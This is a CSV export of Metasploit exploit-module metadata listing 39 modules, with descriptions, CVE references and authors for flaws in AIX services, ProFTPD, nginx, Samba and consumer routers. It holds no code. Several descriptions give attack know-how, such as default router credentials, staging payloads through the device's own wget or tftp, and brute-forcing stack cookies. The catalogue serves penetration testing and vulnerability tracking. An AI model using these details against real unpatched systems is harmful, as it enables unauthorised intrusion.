"id","mtime","file","mtype","refname","fullname","name","rank","description","license","privileged","disclosure_date","default_target","default_action","stance","ready","ref_names","author_names"
1,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/aix/rpc_cmsd_opcode21.rb","exploit","aix/rpc_cmsd_opcode21","exploit/aix/rpc_cmsd_opcode21","AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",500,"This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the ""rtable_create"" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible.","Metasploit Framework License (BSD)","f","2009-10-07 00:00:00",0,,"aggressive","t","BID-36615, CVE-2009-3699, OSVDB-58726, URL-http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825","Rodrigo Rubira Branco (BSDaemon), jduck "
2,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/aix/rpc_ttdbserverd_realpath.rb","exploit","aix/rpc_ttdbserverd_realpath","exploit/aix/rpc_ttdbserverd_realpath","ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",500,"This module exploits a buffer overflow vulnerability in the _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd).","Metasploit Framework License (BSD)","f","2009-06-17 00:00:00",0,,"aggressive","t","CVE-2009-2727, OSVDB-55151","Adriano Lima , Ramon de C Valle "
3,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/browser/safari_libtiff.rb","exploit","apple_ios/browser/safari_libtiff","exploit/apple_ios/browser/safari_libtiff","Apple iOS MobileSafari LibTIFF Buffer Overflow",400,"This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19283, CVE-2006-3459, OSVDB-27723","hdm , kf "
4,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/email/mobilemail_libtiff.rb","exploit","apple_ios/email/mobilemail_libtiff","exploit/apple_ios/email/mobilemail_libtiff","Apple iOS MobileMail LibTIFF Buffer Overflow",400,"This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19283, CVE-2006-3459, OSVDB-27723","hdm , kf "
5,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb","exploit","apple_ios/ssh/cydia_default_ssh","exploit/apple_ios/ssh/cydia_default_ssh","Apple iOS Default SSH Password Vulnerability",600,"This module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed.","Metasploit Framework License (BSD)","t","2007-07-02 00:00:00",0,,"aggressive","t","OSVDB-61284","hdm "
6,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/bsdi/softcart/mercantec_softcart.rb","exploit","bsdi/softcart/mercantec_softcart","exploit/bsdi/softcart/mercantec_softcart","Mercantec SoftCart CGI Overflow",500,"This is an exploit for an undisclosed buffer overflow in the SoftCart.exe CGI as shipped with Mercantec's shopping cart software. It is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b.","Metasploit Framework License (BSD)","f","2004-08-19 00:00:00",0,,"aggressive","t","BID-10926, CVE-2004-2221, OSVDB-9011","skape , trew"
7,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/dialup/multi/login/manyargs.rb","exploit","dialup/multi/login/manyargs","exploit/dialup/multi/login/manyargs","System V Derived /bin/login Extraneous Arguments Buffer Overflow",400,"This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.","Metasploit Framework License (BSD)","f","2001-12-12 00:00:00",0,,"aggressive","t","BID-3681, CVE-2001-0797, OSVDB-690, OSVDB-691, URL-http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html, URL-http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html","I)ruid "
8,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb","exploit","freebsd/ftp/proftp_telnet_iac","exploit/freebsd/ftp/proftp_telnet_iac","ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",500,"This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-11-01 00:00:00",0,,"aggressive","t","BID-44562, CVE-2010-4221, OSVDB-68985","jduck "
9,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/samba/trans2open.rb","exploit","freebsd/samba/trans2open","exploit/freebsd/samba/trans2open","Samba trans2open Overflow (*BSD x86)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck "
10,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/tacacs/xtacacsd_report.rb","exploit","freebsd/tacacs/xtacacsd_report","exploit/freebsd/tacacs/xtacacsd_report","XTACACSD <= 4.1.2 report() Buffer Overflow",200,"This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By sending a specially crafted XTACACS packet with an overly long username, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-01-08 00:00:00",0,,"aggressive","t","CVE-2008-7232, OSVDB-58140, URL-http://aluigi.altervista.org/adv/xtacacsdz-adv.txt","MC "
11,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb","exploit","freebsd/telnet/telnet_encrypt_keyid","exploit/freebsd/telnet/telnet_encrypt_keyid","FreeBSD Telnet Service Encryption Key ID Buffer Overflow",500,"This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.","Metasploit Framework License (BSD)","t","2011-12-23 00:00:00",0,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, OSVDB-78020","Brandon Perry , Dan Rosenberg, Jaime Penalba Estebanez , hdm "
12,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/hpux/lpd/cleanup_exec.rb","exploit","hpux/lpd/cleanup_exec","exploit/hpux/lpd/cleanup_exec","HP-UX LPD Command Execution",600,"This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.","Metasploit Framework License (BSD)","f","2002-08-28 00:00:00",0,,"aggressive","t","CVE-2002-1473, OSVDB-9638, URL-http://archives.neohapsis.com/archives/hp/2002-q3/0064.html","hdm "
13,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/irix/lpd/tagprinter_exec.rb","exploit","irix/lpd/tagprinter_exec","exploit/irix/lpd/tagprinter_exec","Irix LPD tagprinter Command Execution",600,"This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix.","Metasploit Framework License (BSD)","f","2001-09-01 00:00:00",0,,"aggressive","t","CVE-2001-0800, OSVDB-8573, URL-http://www.lsd-pl.net/code/IRIX/irx_lpsched.c","hdm , optyx "
14,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb","exploit","linux/browser/adobe_flashplayer_aslaunch","exploit/linux/browser/adobe_flashplayer_aslaunch","Adobe Flash Player ActionScript Launch Command Execution Vulnerability",400,"This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36).","Metasploit Framework License (BSD)","f","2008-12-17 00:00:00",0,,"passive","t","BID-32896, CVE-2008-5499, OSVDB-50796, URL-http://www.adobe.com/support/security/bulletins/apsb08-24.html","0a29406d9794e4f9b30b3c5d6702c708"
15,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ftp/proftp_sreplace.rb","exploit","linux/ftp/proftp_sreplace","exploit/linux/ftp/proftp_sreplace","ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",500,"This module exploits a stack-based buffer overflow in versions 1.2 through 1.3.0 of ProFTPD server. The vulnerability is within the ""sreplace"" function within the ""src/support.c"" file. The off-by-one heap overflow bug in the ProFTPD sreplace function was discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one bug via the MKD command, but failed. We did not work on this bug since then. Actually, there exist at least two bugs in the sreplace function: one is the mentioned off-by-one heap overflow bug, the other is a stack-based buffer overflow via 'sstrncpy(dst,src,negative argument)'. We were unable to reach the ""sreplace"" stack bug on the ProFTPD 1.2.10 stable version, but version 1.3.0rc3 introduced some interesting changes, among them: 1. another (integer) overflow in sreplace! 2. now it is possible to reach the sreplace stack-based buffer overflow bug via the ""pr_display_file"" function! 3. stupid '.message' file display bug. So we decided to choose ProFTPD 1.3.0 as a target for our exploit. To reach the bug, you need to upload a specially created .message file to a writeable directory, then do ""CWD "" to trigger the invocation of the sreplace function. Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display the '.message' file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug. The exploit is a part of VulnDisco Pack since Dec 2005.","Metasploit Framework License (BSD)","t","2006-11-26 00:00:00",0,,"aggressive","t","BID-20992, CVE-2006-5815, OSVDB-68985, URL-http://bugs.proftpd.org/show_bug.cgi?id=2858, URL-http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h, URL-http://seclists.org/bugtraq/2006/Nov/538, URL-http://seclists.org/bugtraq/2006/Nov/94","Evgeny Legerov , jduck "
16,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ftp/proftp_telnet_iac.rb","exploit","linux/ftp/proftp_telnet_iac","exploit/linux/ftp/proftp_telnet_iac","ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",500,"This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code. The Debian Squeeze version of the exploit uses a little ROP stub to indirectly transfer the flow of execution to a pool buffer (the cmd_rec ""res"" in ""pr_cmd_read""). The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub to it, and execute the stub. The stub then copies the remainder of the payload in and executes it. NOTE: Most Linux distributions either do not ship a vulnerable version of ProFTPD, or they ship a version compiled with stack smashing protection. Although SSP significantly reduces the probability of a single attempt succeeding, it will not prevent exploitation. Since the daemon forks in a default configuration, the cookie value will remain the same despite some attempts failing. By making repeated requests, an attacker can eventually guess the cookie value and exploit the vulnerability. The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness and could allow exploitation in a semi-reasonable amount of time.","Metasploit Framework License (BSD)","t","2010-11-01 00:00:00",0,,"aggressive","t","BID-44562, CVE-2010-4221, OSVDB-68985","jduck "
17,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/games/ut2004_secure.rb","exploit","linux/games/ut2004_secure","exploit/linux/games/ut2004_secure","Unreal Tournament 2004 ""secure"" Overflow (Linux)",400,"This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.","BSD License","t","2004-06-18 00:00:00",,,"aggressive","t","BID-10570, CVE-2004-0608, OSVDB-7217","onetwo"
18,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb","exploit","linux/http/alcatel_omnipcx_mastercgi_exec","exploit/linux/http/alcatel_omnipcx_mastercgi_exec","Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",0,"This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifying shell metacharacters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response.","Metasploit Framework License (BSD)","f","2007-09-09 00:00:00",0,,"aggressive","t","BID-25694, CVE-2007-3010, OSVDB-40521, URL-http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm","patrick "
19,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/ddwrt_cgibin_exec.rb","exploit","linux/http/ddwrt_cgibin_exec","exploit/linux/http/ddwrt_cgibin_exec","DD-WRT HTTP Daemon Arbitrary Command Execution",600,"This module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account.","Metasploit Framework License (BSD)","t","2009-07-20 00:00:00",0,,"aggressive","t","BID-35742, CVE-2009-2765, EDB-9209, OSVDB-55990","gat3way, hdm "
20,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb","exploit","linux/http/dlink_diagnostic_exec_noauth","exploit/linux/http/dlink_diagnostic_exec_noauth","DLink DIR-645 / DIR-815 diagnostic.php Command Execution",600,"Some DLink Routers are vulnerable to OS Command injection in the web interface. On DIR-645 versions prior to 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability, which has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability. Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability.","Metasploit Framework License (BSD)","t","2013-03-05 00:00:00",1,,"passive","t","BID-58938, EDB-24926, OSVDB-92144, URL-http://www.s3cur1ty.de/m1adv2013-017","Michael Messner , juan vazquez "
21,"2013-05-20 21:27:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dlink_dir615_up_exec.rb","exploit","linux/http/dlink_dir615_up_exec","exploit/linux/http/dlink_dir615_up_exec","D-Link DIR615h OS Command Injection",600,"Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a controlled system could be used for testing purposes. The exploit uses the wget client from the device to convert the command injection into an arbitrary payload execution.","Metasploit Framework License (BSD)","t","2013-02-07 00:00:00",1,,"passive","t","BID-57882, EDB-24477, OSVDB-90174, URL-http://www.s3cur1ty.de/m1adv2013-008","Michael Messner , juan vazquez "
22,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dolibarr_cmd_exec.rb","exploit","linux/http/dolibarr_cmd_exec","exploit/linux/http/dolibarr_cmd_exec","Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",600,"This module exploits a vulnerability found in Dolibarr ERP/CRM's backup feature. This software is used to manage a company's business information such as contacts, invoices, orders, stocks, agenda, etc. When processing a database backup request, the export.php function does not check the input given to the sql_compat parameter, which allows a remote authenticated attacker to inject system commands into it, and then gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-04-06 00:00:00",0,,"aggressive","t","OSVDB-80980, URL-http://seclists.org/fulldisclosure/2012/Apr/78","Nahuel Grisolia , sinn3r "
23,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/dreambox_openpli_shell.rb","exploit","linux/http/dreambox_openpli_shell","exploit/linux/http/dreambox_openpli_shell","OpenPLI Webif Arbitrary Command Execution",500,"Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This module has been tested in a box with the following features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition).","Metasploit Framework License (BSD)","t","2013-02-08 00:00:00",0,,"aggressive","t","BID-57943, EDB-24498, OSVDB-90230, URL-http://openpli.org/wiki/Webif, URL-http://www.s3cur1ty.de/m1adv2013-007","Michael Messner "
24,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/esva_exec.rb","exploit","linux/http/esva_exec","exploit/linux/http/esva_exec","E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",600,"This module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This module has been successfully tested on the ESVA_2057 appliance.","Metasploit Framework License (BSD)","f","2012-08-16 00:00:00",0,,"aggressive","t","BID-55050, EDB-20551","iJoo, juan vazquez "
25,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/gpsd_format_string.rb","exploit","linux/http/gpsd_format_string","exploit/linux/http/gpsd_format_string","Berlios GPSD Format String Vulnerability",200,"This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre.","Metasploit Framework License (BSD)","f","2005-05-25 00:00:00",,,"aggressive","t","BID-12371, CVE-2004-1388, OSVDB-13199, URL-http://www.securiteam.com/unixfocus/5LP0M1PEKK.html","Yann Senotier "
26,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb","exploit","linux/http/groundwork_monarch_cmd_exec","exploit/linux/http/groundwork_monarch_cmd_exec","GroundWork monarch_scan.cgi OS Command Injection",600,"This module exploits a vulnerability found in GroundWork 6.7.0. This software is used for network, application and cloud monitoring. The vulnerability exists in the monarch_scan.cgi where user controlled input is used in the perl qx function. This allows any remote authenticated attacker, regardless of privileges, to inject system commands and gain arbitrary code execution. The module has been tested successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04 based VM appliance.","Metasploit Framework License (BSD)","f","2013-03-08 00:00:00",0,,"aggressive","t","OSVDB-91051, URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt, US-CERT-VU-345260","Johannes Greil, juan vazquez "
27,"2013-05-30 14:36:26","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/hp_system_management.rb","exploit","linux/http/hp_system_management","exploit/linux/http/hp_system_management","HP System Management Anonymous Access Code Execution",300,"This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.","Metasploit Framework License (BSD)","f","2012-09-01 00:00:00",0,,"aggressive","t","OSVDB-91812","agix"
28,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_apply_cgi.rb","exploit","linux/http/linksys_apply_cgi","exploit/linux/http/linksys_apply_cgi","Linksys WRT54 Access Point apply.cgi Buffer Overflow",500,"This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS versions prior to 1.05.2 may be affected.","Metasploit Framework License (BSD)","f","2005-09-13 00:00:00",0,,"aggressive","t","CVE-2005-2799, OSVDB-19389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305","Julien Tinnes , Raphael Rigo "
29,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_e1500_apply_exec.rb","exploit","linux/http/linksys_e1500_apply_exec","exploit/linux/http/linksys_e1500_apply_exec","Linksys E1500/E2500 apply.cgi Remote Command Injection",600,"Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.","Metasploit Framework License (BSD)","t","2013-02-05 00:00:00",1,,"passive","t","BID-57760, EDB-24475, OSVDB-89912, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner , juan vazquez "
30,"2013-05-20 21:27:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb","exploit","linux/http/linksys_wrt160nv2_apply_exec","exploit/linux/http/linksys_wrt160nv2_apply_exec","Linksys WRT160nv2 apply.cgi Remote Command Injection",600,"Some Linksys Routers are vulnerable to an authenticated OS command injection on their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage native payloads from the command injection.","Metasploit Framework License (BSD)","t","2013-02-11 00:00:00",1,,"aggressive","t","BID-57887, EDB-24478, OSVDB-90093, URL-http://www.s3cur1ty.de/m1adv2013-012","Michael Messner , juan vazquez "
31,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb","exploit","linux/http/linksys_wrt54gl_apply_exec","exploit/linux/http/linksys_wrt54gl_apply_exec","Linksys WRT54GL apply.cgi Command Execution",0,"Some Linksys Routers are vulnerable to an authenticated OS command injection in the Web Interface. Default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. The user must be prudent when using this module since it modifies the router configuration during exploitation, even when it tries to restore previous values.","Metasploit Framework License (BSD)","t","2013-01-18 00:00:00",1,,"passive","t","BID-57459, EDB-24202, OSVDB-89912, URL-http://www.s3cur1ty.de/m1adv2013-001","Michael Messner , juan vazquez "
32,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/mutiny_frontend_upload.rb","exploit","linux/http/mutiny_frontend_upload","exploit/linux/http/mutiny_frontend_upload","Mutiny 5 Arbitrary File Upload",600,"This module exploits a code execution flaw in the Mutiny 5 appliance. The EditDocument servlet provides a file upload function to authenticated users. A directory traversal vulnerability in the same functionality allows for arbitrary file upload, which results in arbitrary code execution with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.","Metasploit Framework License (BSD)","t","2013-05-15 00:00:00",0,,"aggressive","t","CVE-2013-0136, URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities, US-CERT-VU-701572","juan vazquez "
33,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb","exploit","linux/http/netgear_dgn1000b_setup_exec","exploit/linux/http/netgear_dgn1000b_setup_exec","Netgear DGN1000B setup.cgi Remote Command Execution",600,"Some Netgear Routers are vulnerable to authenticated OS Command injection. The vulnerability exists in the web interface, specifically in the setup.cgi component, when handling the TimeToLive parameter. Default credentials are always a good starting point, admin/admin or admin/password could be a first try. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.","Metasploit Framework License (BSD)","t","2013-02-06 00:00:00",1,,"passive","t","BID-57836, EDB-24464, OSVDB-89985, URL-http://www.s3cur1ty.de/m1adv2013-005","Michael Messner , juan vazquez "
34,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb","exploit","linux/http/netgear_dgn2200b_pppoe_exec","exploit/linux/http/netgear_dgn2200b_pppoe_exec","Netgear DGN2200B pppoe.cgi Remote Command Execution",0,"Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module overwrites parts of the PPPoE configuration; while the module tries to restore it after exploitation, a configuration backup is recommended.","Metasploit Framework License (BSD)","t","2013-02-15 00:00:00",1,,"passive","t","BID-57998, EDB-24513, OSVDB-90320, URL-http://www.s3cur1ty.de/m1adv2013-015","Michael Messner , juan vazquez "
35,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/nginx_chunked_size.rb","exploit","linux/http/nginx_chunked_size","exploit/linux/http/nginx_chunked_size","Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in ngx_http_parse_chunked() by supplying an overly long hex value as the chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.","Metasploit Framework License (BSD)","f","2013-05-07 00:00:00",0,,"aggressive","t","CVE-2013-2028, OSVDB-93037, URL-http://nginx.org/en/security_advisories.html, URL-http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html","Greg MacManus, hal, saelo"
36,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/openfiler_networkcard_exec.rb","exploit","linux/http/openfiler_networkcard_exec","exploit/linux/http/openfiler_networkcard_exec","Openfiler v2.x NetworkCard Command Execution",600,"This module exploits a vulnerability in Openfiler v2.x which could be abused to allow authenticated users to execute arbitrary code under the context of the 'openfiler' user. The 'system.html' file uses user controlled data from the 'device' parameter to create a new 'NetworkCard' object. The class constructor in 'network.inc' calls exec() with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without providing a system password.","Metasploit Framework License (BSD)","f","2012-09-04 00:00:00",0,,"aggressive","t","BID-55490, URL-http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/","Brendan Coles "
37,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/peercast_url.rb","exploit","linux/http/peercast_url","exploit/linux/http/peercast_url","PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",200,"This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.","BSD License","f","2006-03-08 00:00:00",,,"aggressive","t","BID-17040, CVE-2006-1148, OSVDB-23777, URL-http://www.infigo.hr/in_focus/INFIGO-2006-03-01","MC "
38,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/piranha_passwd_exec.rb","exploit","linux/http/piranha_passwd_exec","exploit/linux/http/piranha_passwd_exec","RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution",600,"This module abuses two flaws - a metacharacter injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild.","Metasploit Framework License (BSD)","f","2000-04-04 00:00:00",0,,"aggressive","t","BID-1148, BID-1149, CVE-2000-0248, CVE-2000-0322, OSVDB-1300, OSVDB-289","patrick "
39,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_exec.rb","exploit","linux/http/symantec_web_gateway_exec","exploit/linux/http/symantec_web_gateway_exec","Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",600,"This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service due to the insecure usage of the exec() function. This module abuses the spywall/ipchange.php file to execute arbitrary OS commands without authentication.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","BID-53444, CVE-2012-0297, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-090","Tenable Network Security, juan vazquez "
